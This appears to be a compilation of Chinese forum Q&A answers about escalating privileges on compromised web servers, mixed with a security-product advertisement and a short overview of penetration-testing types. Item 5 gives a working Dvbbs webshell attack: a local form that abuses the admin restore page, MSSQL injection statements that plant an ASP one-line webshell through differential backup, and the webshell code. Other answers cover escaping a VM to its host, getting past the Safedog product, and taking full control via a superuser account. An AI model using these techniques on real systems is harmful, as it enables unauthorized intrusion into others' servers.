提權伺服器

1、伺服器被提權怎麼辦？

為了安全，最好重裝系統。裝好後打好補丁，再裝個伺服器入侵防禦系統，基本上可以保證伺服器安全了。

風雲防火牆伺服器入侵防護系統功能介紹：（外防 內保）
防禦DDOS攻擊功能：
1.SYN Flood CC 類攻擊，快速設置埠過濾規則,流量統計
2.ARP保護功能，防止數據被嗅探和被修改掛馬
伺服器入侵防護功能：
3.SQL防注入功能保護伺服器所有網站免受入侵煩惱
4.進程保護模式可使木馬和病毒拒之門外
5.文件保護模式可使網站文件不被篡改
6.注冊表保護模式保護不讓安裝服務啟動和驅動項目
7.系統用戶名監控防止黑客新建用戶名
8.手機簡訊通知功能能讓你了解伺服器安全狀態
使用最佳狀況表現：打造出一台安全省心免維護的伺服器。

2、網站入侵webshell提權~伺服器後台~~~急

方法分類
1、黑箱測試
黑箱測試又被稱為所謂的「Zero-Knowledge Testing」，滲透者完全處於對系統一無所知的狀態，通常這類型測試，最初的信息獲取來自於DNS、Web、Email及各種公開對外的伺服器。
2、白盒測試
白盒測試與黑箱測試恰恰相反，測試者可以通過正常渠道向被測單位取得各種資料，包括網路拓撲、員工資料甚至網站或其它程序的代碼片斷，也能夠與單位的其它員工（銷售、程序員、管理者……）進行面對面的溝通。這類測試的目的是模擬企業內部雇員的越權操作。
3、隱秘測試
隱秘測試是對被測單位而言的，通常情況下，接受滲透測試的單位網路管理部門會收到通知：在某些時段進行測試。因此能夠監測網路中出現的變化。但隱秘測試則被測單位也僅有極少數人知曉測試的存在，因此能夠有效地檢驗單位中的信息安全事件監控、響應、恢復做得是否到位。

3、伺服器被提權，求網站劫持大神來看看 高分懸賞 不夠再加

VPS不是很方便么？直接備份一下數據，然後直接控制面板中摧毀。
被黑了主要可能是某一個網站有提權的漏洞，自己慢慢分析一下吧。

4、VMware 提權 拿到主伺服器管理許可權？

樓主：

你的問題可以這個改，

我得到一個虛擬機許可權，我想得到它的宿主機許可權，請各位黑客們幫忙。

你最好先知道宿主機是ESXi，GSX, workstation的哪一種？

5、怎麼提權並拿下伺服器？

1.試試在後台能不能修改配置文件，修改上傳文件的類型，能的話就填加asp文件
2.如果是asp+mssql系統，這里需要提一點動網mssql版，但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片，然後記住其上傳路徑。寫一個本地提交的表單，代碼如下：

＜form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"＞

＜p＞已上傳文件的位置：＜input name="Dbpath" type="text" size="80"＞＜/p＞

＜p＞要復制到的位置：＜input name="backpath" type="text" size="80"＞＜/p＞

＜p＞＜input type="submit" value="提交"＞＜/p＞ ＜/form＞

另存為.htm本地執行。把假圖片上傳路徑填在「已上傳文件的位置」那裡，想要備份的WebShell的相對路徑填寫在「要復制到的位置」那裡，提交就得到我們可愛的WebShell了，恢復代碼和此類似，修改相關地方就可以了。沒有遇到過後台執行mssql命令比較強大的asp程序後台，動網的資料庫還原和備份是個擺設，不能執行sql命令備份webshell，只能執行一些簡單的查詢命令。可以利用mssql注入差異備份webshell，一般後台是顯示了絕對路徑，只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼，利用動網7.0的注入漏洞可以用差異備份一個webshell，可以用利用上面提到的方法，將conn.asp文件備份成.txt文件而獲得庫名。

差異備份的主要代碼：

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

;insert into heige(cmd) values()--

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

這段代碼中，0x626273是要備份的庫名bbs的十六進制，可以是其他名字比如bbs.bak; 是＜%execute request("l")%＞的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:\web\1.asp的十六進制,也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell，唯一的不足就是備份後的文件過大，如果備份資料庫中有防下載的的數據表，或者有錯誤的asp代碼，備份出來的webshell就不會成功運行，利用差異備份是成功率比較高的方法，並且極大的減少備份文件的大小。

由於不知道你那的具體情況，是能隨便找了點東西給你，希望能幫到你

6、想提權一台伺服器，其他的搞定了，但是伺服器裝有安全狗，加不了賬戶到管理組，shift後門也被限制了

伺服器安全狗主動防禦模塊中有賬戶保護功能，除非你能夠關閉掉伺服器安全狗的防護功能。否則是沒辦法創建的。而且安全狗軟體可以設置啟動密碼，所以即便知道是被伺服器安全狗保護住了，想關閉保護功能沒密碼的情況下也是關不掉的。

另外，一旦伺服器上還裝有網站安全狗，那樣想上傳木馬文件都沒辦法了。3.5beat版的網站安全狗還增加了防中國菜刀連接的功能和網站後台登陸保護功能，這狗要逆天了。。。

放棄吧，基本沒希望搞定的

請採納，謝謝

7、拿到webshell後如何提權拿下他的伺服器？

有了shell,建超級用戶，安裝遠程式控制制服務端，從客戶端連接進行控制伺服器。